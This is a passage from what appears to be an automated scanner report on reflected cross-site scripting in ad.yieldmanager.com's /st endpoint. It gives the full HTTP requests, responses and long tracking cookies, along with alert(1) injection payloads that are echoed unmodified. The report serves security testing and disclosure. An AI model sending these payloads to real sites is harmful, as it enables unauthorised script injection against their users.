/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q"; lifb=19kC6nGAQ+=*:mYO4LZ!XX>^U:?6)S`%_hj5jn]FcU3vucQ.!y%54b^)<HPu)9P]<`=o7ea<Eq?; ih="b!!!!a!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!#=)mpM!.g%_!!!!$=)moR!.g(s!!!!#=)mv/!.g(t!!!!$=)ms?!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!08vf!!!!#=)mbi!0Q8#!!!!#=)mx$!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!#=)mjl!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!$=)n%6!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2jZq!!!!#=)mWk!2j[4!!!!#=)mWB!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT!3'oN!!!!)=)n#A!349Y!!!!#=)m[Z!34t)!!!!#=)mrD"; vuday1=^cl#I:l(jr!/Hu>SXYW?; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:30:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0350.rm.bf1
Set-Cookie: ih="b!!!!d!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!#=)mpM!.g%_!!!!$=)moR!.g(s!!!!#=)mv/!.g(t!!!!$=)ms?!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!08vf!!!!#=)mbi!0Q8#!!!!#=)mx$!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!#=)mjl!1@m6!!!!$=%3V#!1U$i!!!!#=)n'd!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!#=)n'>!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!$=)n%6!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!#=)n%a!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2jZq!!!!#=)mWk!2j[4!!!!#=)mWB!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT!3'oN!!!!)=)n#A!349Y!!!!#=)m[Z!34t)!!!!#=)mrD"; path=/; expires=Thu, 27-Jun-2013 02:30:04 GMT
Set-Cookie: vuday1=^cl#L:l(jr!/Hu>/JbO9; path=/; expires=Wed, 29-Jun-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 02:30:04 GMT
Pragma: no-cache
Content-Length: 3097
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt language="Javascr'+'ipt" type="text/javascr'+'ipt" src="http://fw.adsafeprotected.com/rjss/at/9746/84741/M0N/jview/310675043/direct;wi.300;hi.250/01/1309
...[SNIP]...
';
var asci_advliid = '3255117';
var asci_cid = '8952013';
var asci_p = '200';
var asci_refurl = escape('http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=insert_random_number_here&loc=.529be'-alert(1)-'e2b488d60e8');
if ( asci_refurl.length >
...[SNIP]...

1.138. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda38"><script>alert(1)</script>a85a84a684d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1887835&cda38"><script>alert(1)</script>a85a84a684d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!_!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=):+(!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=):+(!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=):+(!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:30:05 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 01:30:05 GMT
Pragma: no-cache
Content-Length: 4724
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&cda38"><script>alert(1)</script>a85a84a684d=1&s=1887835&_salt=450222217&t=2" target="_parent">
...[SNIP]...

1.139. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329c7"-alert(1)-"2dd5a4072bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1887835&329c7"-alert(1)-"2dd5a4072bd=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!_!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=):+(!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=):+(!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=):+(!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#